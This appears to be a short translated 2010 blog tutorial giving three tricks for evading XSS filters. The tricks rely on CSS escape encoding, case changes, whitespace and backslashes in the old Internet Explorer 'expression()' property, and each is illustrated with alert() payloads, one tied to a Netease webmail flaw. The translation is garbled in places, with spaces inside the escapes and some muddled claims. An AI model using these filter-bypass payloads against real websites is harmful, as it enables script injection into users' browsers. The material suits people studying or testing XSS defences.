XSS vulnerability mining-Three Tips for CSS encoding and backslash

Encoding and backslash are also basic methods to be mastered in XSS vulnerability mining. Here we provide three techniques for XSS vulnerability mining that use CSS encoding and backslash.

Author & Translator: www.pulog.org
2010/07/17

Tip 1: change the number of 0 encoded values (\ 0X-> \ 00000X ).
Example: <p style = "xss: \ 65 xpression (alert (/wpulog/)">
<P style = "xss: \ 065 xpression (alert (/wpulog/)">
<P style = "xss: \ 0065 xpression (alert (/wpulog/)">
The results are the same.

Tip 2: Change the case sensitivity of the encoded characters (\ 0A-> \ 0a ).
Example: <p style = "xss: expression (alert (/wpulog/) \ x0d">
<P style = "xss: expression (alert (/wpulog/) \ x0D">
The results are the same.

Tip 3: Add a blank character (IE supports \ x20, \ x09; FF and Opera Support \ x0A, \ x0D) behind the encoded characters ).
For example, in IE, <p sytle = "xss: \ 65 xpression (alert (/wpulog/)"> can also run, with spaces between \ 65 and x.

In addition, adding a backslash before a letter in CSS will be ignored. For example, \ x is equivalent to x, and \ n is not equal to n. You can also add a backslash before the line break (\ x0A, \ X0D) in Firefox, for example, <div style = "xx:
\
Gg ">
In IE, the CSS attribute value can be inserted with an empty character (\ 0). For example, the Netease mailbox Webmail XSS Vulnerability
<P style = "xss: ex & #00; pression (alert (/wpulog/)">.
Different browsers may support different encoding methods. For example, Firefox does not support encoding of parentheses. IE supports parentheses, for example, <p style = "xss: expression \ 28alert \ 28/wpulog/\ 29 \ 29"> which can be normally executed in IE.
These techniques can be used in combination with other encoding methods, and may receive unexpected results in XSS vulnerability mining.


[+] Reference:
~~~~~~~~~
Http://heideri.ch/jso/#61